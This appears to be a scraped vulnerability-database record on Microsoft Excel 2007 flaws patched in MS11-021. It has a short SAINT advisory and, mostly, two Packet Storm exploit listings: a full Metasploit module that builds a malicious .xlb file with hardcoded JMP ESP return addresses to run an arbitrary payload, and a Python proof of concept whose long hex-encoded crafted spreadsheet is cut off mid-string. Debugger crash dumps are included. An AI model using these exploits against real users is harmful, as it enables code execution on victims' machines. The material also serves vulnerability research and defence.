11/08/2011 \nCVE: [CVE-2011-0097](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0097>) \nOSVDB: [71758](<http://www.osvdb.org/71758>) \n\n\n### Background\n\nMicrosoft Excel, part of the [Microsoft Office](<http://office.microsoft.com>) product suite, is a spreadsheet application for Windows and Macintosh platforms. \n\n### Problem\n\nMicrosoft Excel 2007 versions lacking the patch (KB2464583) detailed in Microsoft Security Advisory MS11-021 contain an integer overflow vulnerability when parsing data included in a `**400h**` substream. An attacker who entices a user to open a specially formatted Excel document may be able to execute arbitrary code on the user's system. \n\n### Resolution\n\nApply the patch outlined in [Microsoft Security Advisory MS11-021](<http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/MS11-021> \n<http://secunia.com/advisories/39122/> \n\n\n### Limitations\n\nExploit works on Microsoft Excel 2007 SP2. \n\nThis exploit requires the Compress-Zlib PERL module, which is available from [cpan.org](<http://cpan.org/modules/by-module/Compress/>). \n\n### Platforms\n\nWindows XP \nWindows 7 \n \n\n", "modified": "2011-11-08T00:00:00", "published": "2011-11-08T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/excel_substream_parsing_integer_overflow", "id": "SAINT:AD5D5006868071901513DB0CC581B4BC", "type": "saint", "title": "Microsoft Excel Substream Parsing Integer Overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:50", "bulletinFamily": "exploit", "description": "", "modified": "2011-11-06T00:00:00", "published": "2011-11-06T00:00:00", "href": "https://packetstormsecurity.com/files/106665/MS11-021-Microsoft-Office-2007-Excel-.xlb-Buffer-Overflow.html", "id": "PACKETSTORM:106665", "type": "packetstorm", "title": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow", "sourceData": "`## \n# $Id: ms11_021_xlb_bof.rb 14172 2011-11-06 20:16:34Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Excel of Microsoft Office 2007. \nBy supplying a malformed .xlb file, an attacker can control the content (source) \nof a memcpy routine, and the number of bytes to copy, therefore causing a stack- \nbased buffer overflow. This results aribrary code execution under the context of \nuser the user. \n}, \n'License' => MSF_LICENSE, \n'Version' => \"$Revision: 14172 $\", \n'Author' => \n[ \n'Aniway', #Initial discovery (via ZDI) \n'abysssec', #RCA, poc \n'sinn3r', #Metasploit \n'juan vazquez' #Metasploit \n], \n'References' => \n[ \n['CVE', '2011-0105'], \n['MSB', 'MS11-021'], \n['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-121/'], \n['URL', 'http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/'] \n], \n'Payload' => \n{ \n'StackAdjustment' => -3500, \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"process\", \n'DisablePayloadHandler' => 'true', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Win XP SP3 (Vista and 7 will try to repair the file) \n['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }], # JMP ESP in EXCEL (Office 2007) \n['Microsoft Office Excel 2007 SP2 on Windows XP', {'Ret'=>0x3006b185}], #JMP ESP in excel \n], \n'Privileged' => false, \n'DisclosureDate' => \"Aug 9 2011\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [true, 'The filename', 'msf.xlb']) \n], self.class) \nend \n \ndef exploit \npath = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2011-0105.xlb') \nf = File.open(path, 'rb') \ntemplate = f.read \nf.close \n \np = payload.encoded \n \n# Offset 1556 \nrecord = '' \nrecord << \"\\xa7\\x00\" #record type \nrecord << \"\\x04\\x00\" #record length \nif target.name =~ /Excel 2007 SP2/ # Microsoft Office Excel 2007 SP2 \nrecord << \"\\xb0\\x0d\\x0c\\x00\" #data \nelse \nrecord << \"\\xb0\\x0f\\x0c\\x00\" #data \nend \n \n# Offset 1564 \ncontinue_record = '' \ncontinue_record << \"\\x3c\\x00\" #record type \ncontinue_record << [p.length+32].pack('v') #length \n \nbuf = '' \nbuf << template[0, 1556] \nbuf << record \nbuf << continue_record \nbuf << rand_text_alpha(1) \nbuf << [target.ret].pack('V*') \nbuf << \"\\x00\"*12 \nbuf << p \nbuf << template[2336, template.length] \n \nfile_create(buf) \nend \nend \n \n=begin \n0:000> r \neax=41414141 ebx=00000000 ecx=00000006 edx=008c1504 esi=0000007f edi=00000005 \neip=301a263d esp=00137ef8 ebp=00137f6c iopl=0 nv up ei pl nz na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nEXCEL!Ordinal40+0x1a263d: \n301a263d 8908 mov dword ptr [eax],ecx ds:0023:41414141=???????? \n0:000> dc esp \n00137ef8 00000000 00000000 41414141 41414141 ........AAAAAAAA \n00137f08 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA \n00137f18 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA \n00137f28 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA \n00137f38 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA \n00137f48 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA \n00137f58 41414141 41414141 41414141 00000000 AAAAAAAAAAAA.... \n00137f68 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA \n=end \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/106665/ms11_021_xlb_bof.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:24:03", "bulletinFamily": "exploit", "description": "", "modified": "2011-04-29T00:00:00", "published": "2011-04-29T00:00:00", "href": "https://packetstormsecurity.com/files/100978/Microsoft-Office-Excel-Buffer-Overflow.html", "id": "PACKETSTORM:100978", "type": "packetstorm", "title": "Microsoft Office Excel Buffer Overflow", "sourceData": "`This is a PoC for MS11-021/CVE-2011-0978 \nMicrosoft Office Excel Axis Properties Record Parsing Buffer Overflow \nw3bd3vil[at]gmail[dot].com \ntwitter.com/w3bd3vil \n \nModify bits at file location 0x39E7 \n \n0:000:x86> r \neax=04dd6380 ebx=ffff5554 ecx=04ab5108 edx=00000000 esi=04ab4800 edi=ffff5554 \neip=2f36a2fd esp=0021420c ebp=00214218 iopl=0 nv up ei pl zr na pe nc \ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 \n2f36a2d5 33d2 xor edx,edx \n2f36a2d7 53 push ebx \n2f36a2d8 8b5d18 mov ebx,dword ptr [ebp+18h] \n2f36a2db 891540cdfc2f mov dword ptr [EXCEL!DllGetLCID+0x32517 (2ffccd40)],edx \n2f36a2e1 3b580c cmp ebx,dword ptr [eax+0Ch] \n2f36a2e4 0f8d8e9c1a00 jge EXCEL!Ordinal40+0x423f78 (2f513f78) \n2f36a2ea 39551c cmp dword ptr [ebp+1Ch],edx \n2f36a2ed 56 push esi \n2f36a2ee 57 push edi \n2f36a2ef 0f84a09c1a00 je EXCEL!Ordinal40+0x423f95 (2f513f95) \n2f36a2f5 395514 cmp dword ptr [ebp+14h],edx \n2f36a2f8 7f27 jg EXCEL!Ordinal40+0x27a321 (2f36a321) \n2f36a2fa 8b4010 mov eax,dword ptr [eax+10h] \n2f36a2fd 8b0498 mov eax,dword ptr [eax+ebx*4] ds:002b:04dab8d0=???????? \n2f36a300 3bc2 cmp eax,edx \n2f36a302 7425 je EXCEL!Ordinal40+0x27a329 (2f36a329) \n2f36a304 0fb738 movzx edi,word ptr [eax] \n2f36a307 8d4c3f02 lea ecx,[edi+edi+2] \n2f36a30b 51 push ecx \neax here points to location in the file 0xFB4. \n0:000:x86> dd eax \n04dd6380 0376ec80 04dd02b0 04dd0330 04dd0318 \n04dd6390 04dd0380 04dd0398 04dd03b0 04dd03c8 \n04dd63a0 04dd03e0 00000000 00000001 00000001 \n04dd63b0 00000001 00000001 00000001 00000001 \n04dd63c0 00000001 00000001 00000001 00000000 \n04dd63d0 00000000 00000000 00000000 00000000 \n04dd63e0 00000000 00000000 00000000 00000000 \n04dd63f0 00000000 00000000 00000000 00000000 \n0:000:x86> dd 0376ec80 \n0376ec80 00630009 0061006c 00730073 006f0077 \n0376ec90 006b0072 eaf10000 00770009 00720061 \n0376eca0 0075006d 00200070 00350023 eaf10000 \n0376ecb0 0283eb30 6666ce60 0283eb40 6666c960 \n0376ecc0 0283eb4c 6666c960 0000f80c 00000000 \n0376ecd0 00006338 00000000 00000001 00000000 \n0376ece0 0283eb98 6666ce60 0283eba4 6666c960 \n0376ecf0 0283ebb0 6666c960 00000000 00000000 \n \nwebDEViL \n\"\"\" \nimport binascii \n \n \nwD=\"d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff090006000000000\" \nwD+=\"000000000000001000000540000000000000000100000feffffff00000000feffffff000000\" \nwD+=\"0053000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\" \nwD+=\"fffffffffffffffffffffffffffffffffffffffffffffffff0908100000060500e228cd07c9\" \nwD+=\"c0000006020000e1000200b004c10002000000e20000005c0070000800004e49492d54524c5\" \nwD+=\"420202020202020202020202020202020202020202020202020202020202020202020202020\" \nwD+=\"202020202020202020202020202020202020202020202020202020202020202020202020202\" \nwD+=\"0202020202020202020202020202020202020202020202020202042000200b0046101020000\" \nwD+=\"00c00100003d011000010002000300040005000600090008009c0002000e001900020000001\" \nwD+=\"20002000000130002000000af0102000000bc01020000003d001200e7fa2c013e2b2d1e3800\" \nwD+=\"00000000010058024000020000008d00020000002200020000000e0002000100b7010200000\" \nwD+=\"0da000200000031001a00c8000000ff7f9001000000000000050141007200690061006c0031\" \nwD+=\"001a00c8000000ff7f9001000000000000050141007200690061006c0031001a00c8000000f\" \nwD+=\"f7f9001000000000000050141007200690061006c0031001a00c8000000ff7f900100000000\" \nwD+=\"0000050141007200690061006c0031001a00a0000000ff7f900100000000000005014100720\" \nwD+=\"0690061006c0031001a00c80004000c009001000001000000050141007200690061006c0031\" \nwD+=\"001a00c800040024009001000001000000050141007200690061006c0031001c00a0000000f\" \nwD+=\"f7f900100000002000006015400610068006f006d00610031001a00dc000000ff7f90010000\" \nwD+=\"00020000050141007200690061006c0031001a009a010000ff7f90010000000000000501410\" \nwD+=\"07200690061006c0031001a009a010000ff7f9001000000000000050141007200690061006c\" \nwD+=\"0031001a0022010000ff7f9001000000020000050141007200690061006c0031001a00bd010\" \nwD+=\"000ff7f9001000000000000050141007200690061006c0031001a00bd010000ff7f90010000\" \nwD+=\"00000000050141007200690061006c0031001a00c80001000a00bc020000000200000501410\" \nwD+=\"07200690061006c0031001a00a0000000ff7f9001000000020000050141007200690061006c\" \nwD+=\"0031001a00c80000000a009001000000020000050141007200690061006c0031001a00c8000\" \nwD+=\"0000c009001000000020000050141007200690061006c0031001a00c8000100ff7fbc020000\" \nwD+=\"00020000050141007200690061006c0031001a00c80001000900bc020000000200000501410\" \nwD+=\"07200690061006c001e041c000500170000222422232c2323305f293b5c28222422232c2323\" \nwD+=\"305c291e04210006001c0000222422232c2323305f293b5b5265645d5c28222422232c23233\" \nwD+=\"05c291e04220007001d0000222422232c2323302e30305f293b5c28222422232c2323302e30\" \nwD+=\"305c291e0427000800220000222422232c2323302e30305f293b5b5265645d5c28222422232\" \nwD+=\"c2323302e30305c291e0437002a003200005f282224222a20232c2323305f293b5f28222422\" \nwD+=\"2a205c28232c2323305c293b5f282224222a20222d225f293b5f28405f291e042e002900290\" \nwD+=\"0005f282a20232c2323305f293b5f282a205c28232c2323305c293b5f282a20222d225f293b\" \nwD+=\"5f28405f291e043f002c003a00005f282224222a20232c2323302e30305f293b5f282224222\" \nwD+=\"a205c28232c2323302e30305c293b5f282224222a20222d223f3f5f293b5f28405f291e0436\" \nwD+=\"002b003100005f282a20232c2323302e30305f293b5f282a205c28232c2323302e30305c293\" \nwD+=\"b5f282a20222d223f3f5f293b5f28405f291e040b00a400060000302e303030301e040a00a5\" \nwD+=\"00050000302e3030301e040800a600030000302e30e000140000000000f5ff2000000000000\" \nwD+=\"00000000000c020e000140001000000f5ff200000f40000000000000000c020e00014000100\" \nwD+=\"0000f5ff200000f40000000000000000c020e000140002000000f5ff200000f400000000000\" \nwD+=\"00000c020e000140002000000f5ff200000f40000000000000000c020e000140000000000f5\" \nwD+=\"ff200000f40000000000000000c020e000140000000000f5ff200000f40000000000000000c\" \nwD+=\"020e000140000000000f5ff200000f40000000000000000c020e000140000000000f5ff2000\" \nwD+=\"00f40000000000000000c020e000140000000000f5ff200000f40000000000000000c020e00\" \nwD+=\"0140000000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400\" \nwD+=\"00000000000000c020e000140000000000f5ff200000f40000000000000000c020e00014000\" \nwD+=\"0000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400000000\" \nwD+=\"00000000c020e0001400000000000100200000000000000000000000c020e000140001002b0\" \nwD+=\"0f5ff200000f80000000000000000c020e000140001002900f5ff200000f800000000000000\" \nwD+=\"00c020e000140001002c00f5ff200000f80000000000000000c020e000140001002a00f5ff2\" \nwD+=\"00000f80000000000000000c020e000140007000000f4ff000000f40000000000000000c020\" \nwD+=\"e000140006000000f4ff000000f40000000000000000c020e000140001000900f5ff200000f\" \nwD+=\"80000000000000000c020e0001400000001000100200000040000000000000000c020e00014\" \nwD+=\"000000000001002000006011114020402000040d20e00014000000010001002000006411114\" \nwD+=\"020402000040d20e00014000000000001002000006011114020402000040f20e00014000000\" \nwD+=\"010001002000006411114020402000040f20e00014000f00000001002000006811114020402\" \nwD+=\"000041620e00014000f00010001002000006c11114020402000041620e00014000000000001\" \nwD+=\"00200000201111402040200000c020e00014000000000001002000006011114020402000041\" \nwD+=\"620e00014001400000001002000006811114020402000040a20e00014000f00000001002000\" \nwD+=\"00080000000000000000c0eeee001400130000000100200000080000000000000000c020e00\" \nwD+=\"01400000000000000200000e011114020402000040f20e0001400000000000000200000e011\" \nwD+=\"114020402000040d20e0001400000000000000200000800000000000000000c020e00014000\" \nwD+=\"00001000000200000840000000000000000c020e0001400140001000000200000ec11114020\" \nwD+=\"402000040a2093020400108003ff93020400118006ff93020400128004ff93020400138007f\" \nwD+=\"f93020400148009ff93020400158008ff93020400008000ff93020400168005ff6001020000\" \nwD+=\"0085000b00c710000000000300616c6c85000a003a22000000000200637785000a00893f000\" \nwD+=\"000000200687785000c0010580000000004007175697a85000c006764000000000400746573\" \nwD+=\"7485000c00ac6f00000000040073746174850011001e80000000000900646576696174696f6\" \nwD+=\"e8500110029830000000009006176672067726170688c00040001000100ae01040008000104\" \nwD+=\"170020000500000001000100000002000200000003000300000004000400000000000000180\" \nwD+=\"01b00210000010b000000010000000000000d3b040001001f000100010018001b0021000001\" \nwD+=\"0b000000020000000000000d3b000001001f000100010018001b00210000010b00000003000\" \nwD+=\"0000000000d3b010001001f000100010018001b00210000010b000000040000000000000d3b\" \nwD+=\"020001001f000100010018001b00210000010b000000050000000000000d3b030001001f000\" \nwD+=\"1000100c1010800c1010000548d0100eb0082000f0000f07a000000000006f040000000011c\" \nwD+=\"000007000000180000000600000002000000050000000300000004000000040000000300000\" \nwD+=\"00500000002000000010000000b000000060000000600000033000bf012000000bf00080008\" \nwD+=\"00810141000008c0014000000840001ef1100000000b0000080c00000817000008f7000010f\" \nwD+=\"c002f059d010000660000000400005441534b08000043415445474f52590500004752414445\" \nwD+=\"160000312f32392c20333020502e203439322c2050203530320d0000382e3620382e3720736\" \nwD+=\"86565741f0000312f3330205175697a2032206f6e20726174657320616e6420726174696f73\" \nwD+=\"130000312f333120322f312043682054657374204120120000322f312c3220702e203531362\" \nwD+=\"02d203531381400006368203720616e642037206e746220636865636b080000686f6d65776f\" \nwD+=\"726b090000636c617373776f726b0400007175697a0400007465737418000073696d696c617\" \nwD+=\"220747269616e676c6573207061636b65740900006368203820746573740f000070726f6a65\" \nwD+=\"6374206f75746c696e650c0000636f6f6c20646f776e20233511000070726f6772657373207\" \nwD+=\"3686565742023371000007765656b6c79207265766965772031351000007765656b6c792072\" \nwD+=\"6576696577203136110000547269676f6e6f6d657472792054657374140000322f362c20372\" \nwD+=\"0702e203739392023312d323520100000702e203533312035333820322f382c39170000392e\" \nwD+=\"3320392e34207079746861676f7265616e2074686d1000007765656b6c79207265766965772\" \nwD+=\"031340d000054726967205477697374657220130000322f32372c3238204d61746820412074\" \nwD+=\"657374150000332f312c3220776b7368742031302e312f31302e361000007765656b6c79207\" \nwD+=\"26576696577203137140000547269676f6e6f6d657472792050726f6a6563740c00006c6f63\" \nwD+=\"7573207061636b65740b0000436972636c65207175697a1f0000332f372c382031312e31206\" \nwD+=\"e6f74657320616e6420707261632041207368740d000050415254494349504154494f4e0d00\" \nwD+=\"0070617274696369706174696f6e0900007761726d75702023350d000050617274696369706\" \nwD+=\"174696f6e090000436c617373776f726b080000486f6d65776f726b0500005175697a200400\" \nwD+=\"00546573740d000046696e616c20617665726167650600006f7574206f66060000677261706\" \nwD+=\"820050000477261646508000053747564656e74731900004879706f746865746963616c2063\" \nwD+=\"6c617373206772616465730400006d65616e0700006d656469616e200400006d6f646506000\" \nwD+=\"06d656469616e08000057656967687465640800004176657261676573080000526567756c61\" \nwD+=\"722008000043617465676f72790400005175697a160000496e73657274207175697a2067726\" \nwD+=\"170682068657265160000496e73657274207465737420677261706820686572650500005465\" \nwD+=\"7374200d00003f20496e73657274206865726504000050757420050000796f7572200300006\" \nwD+=\"f662009000063617465676f7279200800006176657261676573050000686572652004000028\" \nwD+=\"6e6f74090000776569676874656420080000617665726167652908000063772067726164650\" \nwD+=\"a000046696e616c204176672e0400004d65616e08000056617269616e636508000053742e20\" \nwD+=\"4465762e0700005a2d53636f72650600004d656469616e03000056617205000053744465760\" \nwD+=\"600005a73636f72650300004d656405000074686973200500007061737465040000616c6c20\" \nwD+=\"060000677261646573040000686572650500006a757374200700006e756d626572730700006\" \nwD+=\"66967757265200400006f757420040000686f7720030000746f20040000736f727406000073\" \nwD+=\"742064657608000076617269616e63650700007a2d73636f726505000070616765200500007\" \nwD+=\"7696c6c20070000616e7377657220020000612007000070726f6a6563740c00007072657365\" \nwD+=\"6e746174696f6e0800007175657374696f6eff006a000800150b00000c000000a50b00009c0\" \nwD+=\"000001a0c000011010000bb0c0000b2010000530d00004a020000d00d0000c70200002f0e00\" \nwD+=\"00260300007c0e000073030000e70e0000de030000370f00002e0400007d0f000074040000c\" \nwD+=\"00f0000b704000001100000f804000063081500630800000000000000000000150000000002\" \nwD+=\"0000d20a0000000908100000061000e228cd07c9c00000060200000b0214000000000000000\" \nwD+=\"0002000000095110000021c00000d00020001000c00020064000f0002000100110002000000\" \nwD+=\"10000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000100800\" \nwD+=\"008000000000000000000250204000000ff0081000200c10414000000150000008300020000\" \nwD+=\"00840002000000a10022000000ff00010001000100040000000000000000000000e03f00000\" \nwD+=\"0000000e03f0000120002000100dd00020001006300020001005500020008007d000c000000\" \nwD+=\"0000db1f0f00020004007d000c0001000100b60d0f00020004007d000c000300030049030f0\" \nwD+=\"0020004007d000c0004000400b60d0f00060004009d000200010000020e0000000000200000\" \nwD+=\"0000000900000008021000000000000900ff000000000000010f0008021000010000000900f\" \nwD+=\"f000000000000010f0008021000020000000900ff000000000000010f000802100003000000\" \nwD+=\"0900ff000000000000010f0008021000040000000900ff000000000000010f0008021000050\" \nwD+=\"000000900ff000000000000010f0008021000060000000900ff000000000000010f00080210\" \nwD+=\"00070000000900ff000000000000010f0008021000080000000900ff000000000000010f000\" \nwD+=\"8021000090000000900ff000000000000010f00080210000a0000000900ff00000000000001\" \nwD+=\"0f00080210000b0000000900ff000000000000010f00080210000c0000000900ff000000000\" \nwD+=\"000010f00080210000d0000000900ff000000000000010f00080210000e0000000900ff0000\" \nwD+=\"00000000010f00080210000f0000000900ff000000000000010f0008021000100000000900f\" \nwD+=\"f000000000000010f0008021000110000000900ff000000000000010f000802100012000000\" \nwD+=\"0900ff000000000000010f0008021000130000000900ff000000000000010f0008021000140\" \nwD+=\"000000900ff000000000000010f0008021000150000000900ff000000000000010f00080210\" \nwD+=\"00160000000900ff000000000000010f0008021000170000000900ff000000000000010f000\" \nwD+=\"8021000180000000900ff000000000000010f0008021000190000000900ff00000000000001\" \nwD+=\"0f00080210001a0000000900ff000000000000010f00080210001b0000000900ff000000000\" \nwD+=\"000010f00080210001c0000000900ff000000000000010f00080210001d0000000900ff0000\" \nwD+=\"00000000010f00080210001e0000000900ff000000000000010f00080210001f0000000900f\" \nwD+=\"f000000000000010f00fd000a00000004001a0033000000fd000a00000005001a0034000000\" \nwD+=\"fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a00010002000f0\" \nwD+=\"002000000fd000a00010004001a0024000000fd000a00010005001a0025000000fd000a0001\" \nwD+=\"0006001a0026000000fd000a00010007001a0027000000fd000a00010008001a0028000000f\" \nwD+=\"d000a00020000000f0021000000fd000a00020001000f00220000007e020a00020002000f00\" \nwD+=\"000059400600290002000400230000000000000024400000020007ff130024020002c042010\" \nwD+=\"5001f9a9999999999b93f05bd001200020005001b00000028401b0000003440060006003800\" \nwD+=\"020007001b000000000000002b400000020008ff220024050002c024090002c0240b0002c02\" \nwD+=\"41d0002c0420405001f9a9999999999c93f0506003d00020008001b006766666666662c4000\" \nwD+=\"00070004ff270024080002c0240a0002c024110002c0241a0002c0241b0002c0420505001f9\" \nwD+=\"a9999999999c93f05fd000a00030000000f0003000000fd000a00030001000f00090000007e\" \nwD+=\"020a00030002000f0000005940fd000a00040000000f0004000000fd000a00040001000f000\" \nwD+=\"a0000007e020a00040002000f0000005940fd000a00050000000f0005000000fd000a000500\" \nwD+=\"01000f000b0000007e020a00050002000f0000004940fd000a00060000000f0006000000fd0\" \nwD+=\"00a00060001000f00090000007e020a00060002000f0000c05040fd000a00060004001c0029\" \nwD+=\"000000fd000a00070000000f0007000000fd000a00070001000f00090000007e020a0007000\" \nwD+=\"2000f000000444006003300070004001d00cdcccccccc6c51400000580337fd1d0044020004\" \nwD+=\"c044020005c00344020006c00344020007c00344020008c003fd000a00080000000f0008000\" \nwD+=\"000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a0009000000\" \nwD+=\"0f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a0\" \nwD+=\"00a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f00008051\" \nwD+=\"40fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000\" \nwD+=\"f0000005940fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a00\" \nwD+=\"0c0002000f0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a00000\" \nwD+=\"07e020a000d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f\" \nwD+=\"000a0000007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000\" \nwD+=\"f0001000f000a0000007e020a000f0002000f0000004940fd000a000f000400180035000000\" \nwD+=\"fd000a000f000500180036000000fd000a000f000600180034000000fd000a00100000000f0\" \nwD+=\"013000000fd000a00100001000f000a0000007e020a00100002000f0000003440fd000a0010\" \nwD+=\"000400180024000000fd000a0010000500180025000000fd000a0010000600180026000000f\" \nwD+=\"d000a0010000700180037000000fd000a0010000800180028000000fd000a00110000000f00\" \nwD+=\"14000000fd000a00110001000f000c0000007e020a00110002000f0000c0524006001f00110\" \nwD+=\"00400240000000000000059400000020004ff090024020002c042010500bd00120011000500\" \nwD+=\"190000004f40190000005140060006002e001100070019000000000000e050400000110004f\" \nwD+=\"f180024050002c024090002c0240b0002c0241d0002c0420405000600330011000800180000\" \nwD+=\"00000000c051400000110007fe1d0024080002c0240a0002c024110002c0241a0002c0241b0\" \nwD+=\"002c042050500fd000a00120000000f0015000000fd000a00120001000f00090000007e020a\" \nwD+=\"00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009000\" \nwD+=\"0007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000100\" \nwD+=\"0f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd000a0\" \nwD+=\"0150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190000\" \nwD+=\"00fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000000\" \nwD+=\"f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000a00\" \nwD+=\"180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000000\" \nwD+=\"0fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a00190002000f\" \nwD+=\"0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a001\" \nwD+=\"a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000000\" \nwD+=\"7e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c0001000f0\" \nwD+=\"0090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a001d\" \nwD+=\"0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000f\" \nwD+=\"d000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000f00\" \nwD+=\"1e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d70044000f0\" \nwD+=\"a00006c021c007000ea002a002a002a00380061002a002a002a002a002a002a002a00540070\" \nwD+=\"00cc002a002a002a002a002a002a002a002a002a002a002a002a002a00c20118000e0007000\" \nwD+=\"6000904040000801100110001000907080007feec00aa000f0002f038030000100008f00800\" \nwD+=\"0000060000000a1400000f0003f0f80200000f0004f028000000010009f0100000000000000\" \nwD+=\"000000000000000000000000002000af00800000000140000050000000f0004f05200000092\" \nwD+=\"0c0af00800000001140000000a000043000bf0180000007f0004010401bf0008000800ff010\" \nwD+=\"0000800bf0300000200000010f0120000000100010000000100000002000000020000000000\" \nwD+=\"11f0000000005d0046001500120014000100012100000000dc089201000000000c001400000\" \nwD+=\"0000000000000000001000b000000100000001300ee1f00000b000400010300000200140057\" \nwD+=\"0000000000ec0078000f0004f078000000f2030af00800000004140000000a000093000bf03\" \nwD+=\"60000008000503236018500010000008b0002000000bf0008000a0047014f05000048012660\" \nwD+=\"0000810141000008c001400000087f0300000c00000010f0120000000000000077000200d30\" \nwD+=\"0000008030c00f100000011f0000000005d001a00150012001e000400116050323601a80992\" \nwD+=\"010000000000000000ec00080000000df000000000b60112001202000000000000000068001\" \nwD+=\"000000000003c00690000456e74657220796f7572206e6577207461736b7320686572652e20\" \nwD+=\"20596f75206d617920757365207468697320736865657420746f2068656c7020796f752e202\" \nwD+=\"04f70656e207468697320646f63756d656e7420616e64206368616e67652074686520696e66\" \nwD+=\"6f2e3c001000000000006c0211006800000000000000ec0078000f0004f078000000e2030af\" \nwD+=\"00800000005140000000a000093000bf0360000008000a03236018500010000008b00020000\" \nwD+=\"00bf0008000a00470155b5ffff480119d5ffff810141000008c001400000087f0300000c000\" \nwD+=\"00010f01200000000000600d001040088000800e00008000000000011f0000000005d001a00\" \nwD+=\"150012001e0005001160a0323601e40a92010000000000000000ec00080000000df00000000\" \nwD+=\"0b60112001202000000000000000029001000000000003c002a0000436c69636b2074686520\" \nwD+=\"63656c6c20616e6420636865636b206f75742074686520666f726d756c612e3c00100000000\" \nwD+=\"000e90011002900000000000000ec006c000f0004f06c000000c2000af00800000006140000\" \nwD+=\"000a000073000bf02a0000008000f03236018500010000008b0002000000bf0008000a00810\" \nwD+=\"10d000008bf0110001000c00140000008000010f012000000000004008b001300d3000800b0\" \nwD+=\"0120005a00000011f0000000005d001a00150012001e0006001160f0323601d80b920100000\" \nwD+=\"00000000000ec00080000000df000000000b6011200120200000000000000003e0010000000\" \nwD+=\"00003c003f0000496e7365727420746865206772617068206f6620746869732064617461206\" \nwD+=\"f6e2061206e65772073686565742e202053656520646972656374696f6e732e3c0010000000\" \nwD+=\"00005d0111003e00000000000000ec00fa000f0004f0f200000002000af0080000000a14000\" \nwD+=\"0000a0000b3000bf0b8000000bf000800080042011e01000043013a00000044010400000045\" 